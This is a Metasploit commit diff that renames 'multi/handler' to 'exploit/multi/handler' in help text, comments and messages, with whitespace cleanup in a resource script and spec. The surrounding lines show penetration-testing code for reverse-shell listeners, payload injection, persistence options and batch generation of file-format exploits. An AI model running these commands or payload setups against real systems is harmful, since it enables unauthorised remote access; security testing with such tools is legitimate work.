Fix inconstancy - multi/handler

2024-10-29 18:07:27 +01:00 · 2015-06-12 21:23:51 +01:00 · 2015-06-12 21:23:51 +01:00 · a53ca53a6a
commit a53ca53a6a
parent f279c6ca3f
14 changed files with 113 additions and 113 deletions
--- a/modules/exploits/windows/browser/persits_xupload_traversal.rb
+++ b/modules/exploits/windows/browser/persits_xupload_traversal.rb
@ -21,7 +21,7 @@ class Metasploit3 < Msf::Exploit::Remote
        an attacker is able to write arbitrary files to arbitrary locations on disk.

        Code execution occurs by writing to the All Users Startup Programs directory.
-        You may want to combine this module with the use of multi/handler since a
+        You may want to combine this module with the use of exploit/multi/handler since a
        user would have to log for the payload to execute.
      },
      'License'        => MSF_LICENSE,
--- a/modules/exploits/windows/mssql/mssql_linkcrawler.rb
+++ b/modules/exploits/windows/mssql/mssql_linkcrawler.rb
@ -24,7 +24,7 @@ class Metasploit3 < Msf::Exploit::Remote

          If you are attempting to obtain multiple reverse shells using this module we
        recommend setting the "DisablePayloadHandler" advanced option to "true", and setting
-        up a multi/handler to run in the background as a job to support multiple incoming
+        up a exploit/multi/handler to run in the background as a job to support multiple incoming
        shells.

          If you are interested in deploying payloads to spefic servers this module also
@ -89,17 +89,17 @@ class Metasploit3 < Msf::Exploit::Remote

    # Define master array to keep track of enumerated database information
    masterList = Array.new
-    masterList[0] = Hash.new			# Define new hash
-    masterList[0]["name"] = ""			# Name of the current database server
-    masterList[0]["db_link"] = ""		# Name of the linked database server
-    masterList[0]["db_user"] = ""	 	# User configured on the database server link
-    masterList[0]["db_sysadmin"] = ""	# Specifies if  the database user configured for the link has sysadmin privileges
-    masterList[0]["db_version"] = ""	# Database version of the linked database server
-    masterList[0]["db_os"] = ""			# OS of the linked database server
-    masterList[0]["path"] = [[]]		# Link path used during crawl - all possible link paths stored
-    masterList[0]["done"] = 0			# Used to determine if linked need to be crawled
+    masterList[0] = Hash.new            # Define new hash
+    masterList[0]["name"] = ""          # Name of the current database server
+    masterList[0]["db_link"] = ""       # Name of the linked database server
+    masterList[0]["db_user"] = ""       # User configured on the database server link
+    masterList[0]["db_sysadmin"] = ""   # Specifies if  the database user configured for the link has sysadmin privileges
+    masterList[0]["db_version"] = ""    # Database version of the linked database server
+    masterList[0]["db_os"] = ""         # OS of the linked database server
+    masterList[0]["path"] = [[]]        # Link path used during crawl - all possible link paths stored
+    masterList[0]["done"] = 0           # Used to determine if linked need to be crawled

-    shelled = Array.new					# keeping track of shelled systems - multiple incoming sa links could result in multiple shells on one system
+    shelled = Array.new                 # keeping track of shelled systems - multiple incoming sa links could result in multiple shells on one system

    # Setup query for gathering information from database servers
    versionQuery = "select @@servername,system_user,is_srvrolemember('sysadmin'),(REPLACE(REPLACE(REPLACE\
--- a/modules/post/multi/manage/shell_to_meterpreter.rb
+++ b/modules/post/multi/manage/shell_to_meterpreter.rb
@ -33,7 +33,7 @@ class Metasploit3 < Msf::Post
        OptInt.new('LPORT',
          [false, 'Port for Payload to connect to.', 4433]),
        OptBool.new('HANDLER',
-          [ true, 'Start an Exploit Multi Handler to receive the connection', true])
+          [ true, 'Start an exploit/multi/handler to receive the connection', true])
      ], self.class)
    deregister_options('PERSIST', 'PSH_OLD_METHOD', 'RUN_WOW64')
  end
@ -101,7 +101,7 @@ class Metasploit3 < Msf::Post
    if datastore['HANDLER']
      listener_job_id = create_multihandler(lhost, lport, payload_name)
      if listener_job_id.blank?
-        print_error("Failed to start multi/handler on #{datastore['LPORT']}, it may be in use by another process.")
+        print_error("Failed to start exploit/multi/handler on #{datastore['LPORT']}, it may be in use by another process.")
        return nil
      end
    end
@ -208,7 +208,7 @@ class Metasploit3 < Msf::Post
          timer += 1
        end
      end
-      print_status('Stopping multi/handler')
+      print_status('Stopping exploit/multi/handler')
      framework.jobs.stop_job(listener_job_id)
    }
  end
@ -238,12 +238,12 @@ class Metasploit3 < Msf::Post
    return false
  end

-  # Starts a multi/handler session
+  # Starts a exploit/multi/handler session
  def create_multihandler(lhost, lport, payload_name)
    pay = client.framework.payloads.create(payload_name)
    pay.datastore['LHOST'] = lhost
    pay.datastore['LPORT'] = lport
-    print_status('Starting exploit multi handler')
+    print_status('Starting exploit/multi/handler')
    if !check_for_listener(lhost, lport)
      # Set options for module
      mh = client.framework.exploits.create('multi/handler')
--- a/modules/post/multi/manage/system_session.rb
+++ b/modules/post/multi/manage/system_session.rb
@ -28,7 +28,7 @@ class Metasploit3 < Msf::Post
        OptInt.new('LPORT',
          [false, 'Port for Payload to connect to.', 4433]),
        OptBool.new('HANDLER',
-          [ true, 'Start an Exploit Multi Handler to receive the connection', false]),
+          [ true, 'Start an exploit/multi/handler to receive the connection', false]),
        OptEnum.new('TYPE', [true, 'Scripting environment on target to use for reverse shell',
          'auto', ['auto','ruby','python','perl','bash']])
      ], self.class)
@ -111,12 +111,12 @@ class Metasploit3 < Msf::Post
    return conflict
  end

-  # Starts a multi/handler session
+  # Starts a exploit/multi/handler session
  def create_multihand(lhost,lport)
    pay = client.framework.payloads.create("generic/shell_reverse_tcp")
    pay.datastore['LHOST'] = lhost
    pay.datastore['LPORT'] = lport
-    print_status("Starting exploit multi handler")
+    print_status("Starting exploit/multi/handler")
    if not check_for_listner(lhost,lport)
      # Set options for module
      mul = client.framework.exploits.create("multi/handler")
--- a/modules/post/windows/manage/multi_meterpreter_inject.rb
+++ b/modules/post/windows/manage/multi_meterpreter_inject.rb
@ -32,7 +32,7 @@ class Metasploit3 < Msf::Post
        OptInt.new('LPORT',      [false, 'Port number for the payload LPORT variable.', 4444]),
        OptString.new('IPLIST',  [true, 'List of semicolom separated IP list.', Rex::Socket.source_address("1.2.3.4")]),
        OptString.new('PIDLIST', [false, 'List of semicolom separated PID list.', '']),
-        OptBool.new('HANDLER',   [false, 'Start new multi/handler job on local box.', false]),
+        OptBool.new('HANDLER',   [false, 'Start new exploit/multi/handler job on local box.', false]),
        OptInt.new('AMOUNT',     [false, 'Select the amount of shells you want to spawn.', 1])
      ], self.class)

--- a/modules/post/windows/manage/payload_inject.rb
+++ b/modules/post/windows/manage/payload_inject.rb
@ -33,7 +33,7 @@ class Metasploit3 < Msf::Post
        OptAddress.new('LHOST', [true, 'IP of host that will receive the connection from the payload.']),
        OptInt.new('LPORT', [false, 'Port for Payload to connect to.', 4433]),
        OptInt.new('PID', [false, 'Process Identifier to inject of process to inject payload.']),
-        OptBool.new('HANDLER', [ false, 'Start an Exploit Multi Handler to receive the connection', false]),
+        OptBool.new('HANDLER', [ false, 'Start an exploit/multi/handler to receive the connection', false]),
        OptString.new('OPTIONS', [false, "Comma separated list of additional options for payload if needed in \'opt=val,opt=val\' format."]),
        OptInt.new('AMOUNT',  [false, 'Select the amount of shells you want to spawn.', 1])
        ], self.class)
@ -112,9 +112,9 @@ class Metasploit3 < Msf::Post
    return pay
  end

-  # Starts a multi/handler session
+  # Starts a exploit/multi/handler session
  def create_multihand(pay,pay_name,lhost,lport)
-    print_status("Starting exploit multi handler")
+    print_status("Starting exploit/multi/handler")
    if not check_for_listner(lhost,lport)
      # Set options for module
      mul = client.framework.exploits.create("multi/handler")
--- a/4
+++ b/4
@ -95,7 +95,7 @@ class Msfcli
    $stdout.puts "Error: #{str}\n\n" if str
    $stdout.puts tbl.to_s + "\n"
    $stdout.puts "Examples:" + "\n"
-    $stdout.puts "msfcli multi/handler payload=windows/meterpreter/reverse_tcp lhost=IP E" + "\n"
+    $stdout.puts "msfcli exploit/multi/handler payload=windows/meterpreter/reverse_tcp lhost=IP E" + "\n"
    $stdout.puts "msfcli auxiliary/scanner/http/http_version rhosts=IP encoder= post= nop= E" + "\n"
    $stdout.puts extra + "\n" if extra
    $stdout.puts
@ -542,7 +542,7 @@ class Msfcli
        show_payloads(modules)
      end
    when "t"
-      puts 
+      puts
      if modules[:module].file_path =~ /auxiliary\//i
        $stdout.puts("\nError: This type of module does not support targets")
      else
--- a/scripts/meterpreter/duplicate.rb
+++ b/scripts/meterpreter/duplicate.rb
@ -23,7 +23,7 @@ opts = Rex::Parser::Arguments.new(
  "-e"  => [ true,   "Executable to inject into. Default notepad.exe, will fall back to spawn if not found."],
  "-P"  => [ true,   "Process id to inject into; use instead of -e if multiple copies of one executable are running."],
  "-s"  => [ false,  "Spawn new executable to inject to.  Only useful with -P."],
-  "-D"  => [ false,  "Disable the automatic multi/handler (use with -r to accept on another system)"]
+  "-D"  => [ false,  "Disable the automatic exploit/multi/handler (use with -r to accept on another system)"]
 )

 #
--- a/scripts/meterpreter/metsvc.rb
+++ b/scripts/meterpreter/metsvc.rb
@ -18,7 +18,7 @@ session = client
 opts = Rex::Parser::Arguments.new(
  "-h"  => [ false,  "This help menu"],
  "-r"  => [ false,  "Uninstall an existing Meterpreter service (files must be deleted manually)"],
-  "-A"  => [ false,  "Automatically start a matching multi/handler to connect to the service"]
+  "-A"  => [ false,  "Automatically start a matching exploit/multi/handler to connect to the service"]
 )

 # Exec a command and return the results
@ -117,7 +117,7 @@ if client.platform =~ /win32|win64/
  end

  #
-  # Setup the multi/handler if requested
+  # Setup the exploit/multi/handler if requested
  #
  if(autoconn)
    print_status("Trying to connect to the Meterpreter service at #{client.session_host}:#{rport}...")
--- a/scripts/meterpreter/multi_meter_inject.rb
+++ b/scripts/meterpreter/multi_meter_inject.rb
@ -21,7 +21,7 @@ start_handler = nil
@exec_opts = Rex::Parser::Arguments.new(
  "-h"  => [ false,  "Help menu." ],
  "-p"  => [ true,   "The port on the remote host where Metasploit is listening (default: 4444)"],
-  "-m"  => [ false,  "Start Exploit multi/handler for return connection"],
+  "-m"  => [ false,  "Start exploit/multi/handler for return connection"],
  "-pt" => [ true,   "Specify Reverse Connection Meterpreter Payload. Default windows/meterpreter/reverse_tcp"],
  "-mr" => [ true,   "Provide Multiple IP Addresses for Connections separated by comma."],
  "-mp" => [ true,   "Provide Multiple PID for connections separated by comma one per IP."]
--- a/scripts/meterpreter/persistence.rb
+++ b/scripts/meterpreter/persistence.rb
@ -35,7 +35,7 @@ script_on_target = nil
  "-X"  => [ false,  "Automatically start the agent when the system boots"],
  "-U"  => [ false,  "Automatically start the agent when the User logs on"],
  "-S"  => [ false,  "Automatically start the agent on boot as a service (with SYSTEM privileges)"],
-  "-A"  => [ false,  "Automatically start a matching multi/handler to connect to the agent"],
+  "-A"  => [ false,  "Automatically start a matching exploit/multi/handler to connect to the agent"],
  "-L"  => [ true,   "Location in target host to write payload to, if none \%TEMP\% will be used."],
  "-T"  => [ true,   "Alternate executable template to use"],
  "-P"  => [ true,   "Payload to use, default is windows/meterpreter/reverse_tcp."]
@ -237,7 +237,7 @@ raw = create_payload(payload_type, rhost, rport)
 script = create_script(delay, altexe, raw, payload_type.include?('/x64/'))
 script_on_target = write_script_to_target(target_dir, script)

-# Start Multi/Handler
+# Start exploit/multi/handler
 if autoconn
  set_handler(payload_type, rhost, rport)
 end
--- a/scripts/meterpreter/vnc.rb
+++ b/scripts/meterpreter/vnc.rb
@ -21,7 +21,7 @@ opts = Rex::Parser::Arguments.new(
  "-v"  => [ true,   "The local port for the VNC proxy service (default: 5900)"],
  "-i"  => [ false,  "Inject the vnc server into a new process's memory instead of building an exe"],
  "-P"  => [ true,   "Executable to inject into (starts a new process).  Only useful with -i (default: notepad.exe)"],
-  "-D"  => [ false,  "Disable the automatic multi/handler (use with -r to accept on another system)"],
+  "-D"  => [ false,  "Disable the automatic exploit/multi/handler (use with -r to accept on another system)"],
  "-O"  => [ false,  "Disable binding the VNC proxy to localhost (open it to the network)"],
  "-V"  => [ false,  "Disable the automatic launch of the VNC client"],
  "-t"  => [ false,  "Tunnel through the current session connection. (Will be slower)"],
@ -176,7 +176,7 @@ else
 end

 if tunnel
-  # Set up a port forward for the multi/handler to use for uploading the stage
+  # Set up a port forward for the exploit/multi/handler to use for uploading the stage
  print_status("Starting the port forwarding from #{rport} => TARGET:#{rport}")
  client.run_cmd("portfwd add -L 127.0.0.1 -l #{rport} -p #{rport} -r #{lhost}")
 end
--- a/scripts/resource/fileformat_generator.rc
+++ b/scripts/resource/fileformat_generator.rc
@ -1,42 +1,42 @@
 <ruby>
 if (framework.datastore['WIN_PAYL'] != nil)
-	winpayl = framework.datastore['WIN_PAYL']
+    winpayl = framework.datastore['WIN_PAYL']
 else
-	# no payload defined -> we use a messagebox payload :)
-	winpayl = "windows/messagebox"
+    # no payload defined -> we use a messagebox payload :)
+    winpayl = "windows/messagebox"
 end

 if (framework.datastore['OSX_PAYL'] != nil)
-	osxpayl = framework.datastore['OSX_PAYL']
+    osxpayl = framework.datastore['OSX_PAYL']
 else
-	# no payload defined -> we use a generic bind payload :)
-	osxpayl = "generic/shell_bind_tcp"
+    # no payload defined -> we use a generic bind payload :)
+    osxpayl = "generic/shell_bind_tcp"
 end

 if (framework.datastore['MULTI_PAYL'] != nil)
-	multipayl = framework.datastore['MULTI_PAYL']
+    multipayl = framework.datastore['MULTI_PAYL']
 else
-	# no payload defined -> we use a generic bind payload :)
-	multipayl = "generic/shell_bind_tcp"
+    # no payload defined -> we use a generic bind payload :)
+    multipayl = "generic/shell_bind_tcp"
 end

 if (framework.datastore['LHOST'] == nil and (winpayl =~ /reverse/ or osxpayl =~ /reverse/ or multipayl =~ /reverse/))
-	print_error("please define a global LHOST Variable")
-	return
+    print_error("please define a global LHOST Variable")
+    return
 else
-	localIP = framework.datastore['LHOST']
+    localIP = framework.datastore['LHOST']
 end

 if (framework.datastore['VERBOSE'] == "true")
-	verbose = 1 #true
+    verbose = 1 #true
 else
-	verbose = 0
+    verbose = 0
 end

 if (framework.datastore['HANDLERS'] == "true")
-	handlers = 1 #true
+    handlers = 1 #true
 else
-	handlers = 0
+    handlers = 0
 end

 windows = false
@ -44,66 +44,66 @@ multi = false
 osx = false

 framework.exploits.each do |exploit,mod|
-	if(exploit.to_s =~ /fileformat/)
-		print_line("generating fileformat exploit: #{exploit.to_s}")
-		run_single("use #{exploit}")
-		if(exploit.to_s =~ /windows/)
-			#we need this info for starting the handlers
-			windows = true
-			#setting the payload
-			run_single("set PAYLOAD #{winpayl}")
-			if(winpayl =~ /reverse/)
-				run_single("set LHOST #{localIP}")
-				run_single("set LPORT 4444")
-			end
-		elsif(exploit.to_s =~ /multi/)
-			#we need this info for starting the handlers
-			multi = true
-			#setting the payload
-			run_single("set PAYLOAD #{multipayl}")
-			if(winpayl =~ /reverse/)
-				run_single("set LHOST #{localIP}")
-				run_single("set LPORT 5555")
-			end
-		elsif(exploit.to_s =~ /osx/)
-			#we need this info for starting the handlers
-			osx = true
-			#setting the payload
-			run_single("set PAYLOAD #{osxpayl}")
-			if(osxpayl =~ /reverse/)
-				run_single("set LHOST #{localIP}")
-				run_single("set LPORT 6666")
-			end
-		end
-		extension = active_module.datastore['FILENAME'].split('.').last
-		filename = exploit.split('/').last
-		run_single("set FILENAME #{filename}.#{extension}")
-		run_single("exploit")
-		print_line
-	end
+    if(exploit.to_s =~ /fileformat/)
+        print_line("generating fileformat exploit: #{exploit.to_s}")
+        run_single("use #{exploit}")
+        if(exploit.to_s =~ /windows/)
+            #we need this info for starting the handlers
+            windows = true
+            #setting the payload
+            run_single("set PAYLOAD #{winpayl}")
+            if(winpayl =~ /reverse/)
+                run_single("set LHOST #{localIP}")
+                run_single("set LPORT 4444")
+            end
+        elsif(exploit.to_s =~ /multi/)
+            #we need this info for starting the handlers
+            multi = true
+            #setting the payload
+            run_single("set PAYLOAD #{multipayl}")
+            if(winpayl =~ /reverse/)
+                run_single("set LHOST #{localIP}")
+                run_single("set LPORT 5555")
+            end
+        elsif(exploit.to_s =~ /osx/)
+            #we need this info for starting the handlers
+            osx = true
+            #setting the payload
+            run_single("set PAYLOAD #{osxpayl}")
+            if(osxpayl =~ /reverse/)
+                run_single("set LHOST #{localIP}")
+                run_single("set LPORT 6666")
+            end
+        end
+        extension = active_module.datastore['FILENAME'].split('.').last
+        filename = exploit.split('/').last
+        run_single("set FILENAME #{filename}.#{extension}")
+        run_single("exploit")
+        print_line
+    end
 end

 if(handlers == 1)
-	#starting some handlers for reverse connections
-	run_single("use multi/handler")
-	if(windows == true and winpayl =~ /reverse/)
-		run_single("set PAYLOAD #{winpayl}")
-		run_single("set LHOST #{localIP}")
-		run_single("set LPORT 4444")
-		run_single("exploit -j")
-	end
-	if(multi == true and multipayl =~ /reverse/)
-		run_single("set PAYLOAD #{multipayl}")
-		run_single("set LHOST #{localIP}")
-		run_single("set LPORT 5555")
-		run_single("exploit -j")
-	end
-	if(osx == true and osxpayl =~ /reverse/)
-		run_single("set PAYLOAD #{osxpayl}")
-		run_single("set LHOST #{localIP}")
-		run_single("set LPORT 6666")
-		run_single("exploit -j")
-	end
+    #starting some handlers for reverse connections
+    run_single("use exploit/multi/handler")
+    if(windows == true and winpayl =~ /reverse/)
+        run_single("set PAYLOAD #{winpayl}")
+        run_single("set LHOST #{localIP}")
+        run_single("set LPORT 4444")
+        run_single("exploit -j")
+    end
+    if(multi == true and multipayl =~ /reverse/)
+        run_single("set PAYLOAD #{multipayl}")
+        run_single("set LHOST #{localIP}")
+        run_single("set LPORT 5555")
+        run_single("exploit -j")
+    end
+    if(osx == true and osxpayl =~ /reverse/)
+        run_single("set PAYLOAD #{osxpayl}")
+        run_single("set LHOST #{localIP}")
+        run_single("set LPORT 6666")
+        run_single("exploit -j")
+    end
 end
 run_single("back")
 </ruby>
--- a/spec/msfcli_spec.rb
+++ b/spec/msfcli_spec.rb
@ -289,8 +289,8 @@ describe Msfcli, :content do
      }
    end
  end
-  
-  
+
+
  context "#guess_nop_name" do
    subject(:guess_nop_name) {
      msfcli.guess_nop_name(nop_reference_name)
@ -555,8 +555,8 @@ describe Msfcli, :content do
        expect(modules[:module].fullname).to eq(module_name)
      end
    end
-    
-    context 'with multi/handler' do
+
+    context 'with exploit/multi/handler' do
      let(:module_name) {
        'multi/handler'
      }
@ -571,14 +571,14 @@ describe Msfcli, :content do
        expect(modules[:module]).to be_an Msf::Exploit
        expect(modules[:module].refname).to eq(module_name)
      end
-      
+
      context 'with payload' do
        let(:args) {
          super().tap { |args|
            args.insert(-2, "payload=#{payload_reference_name}")
          }
        }
-        
+
        context 'windows/meterpreter/reverse_tcp' do
          let(:payload_reference_name) do
            'windows/meterpreter/reverse_tcp'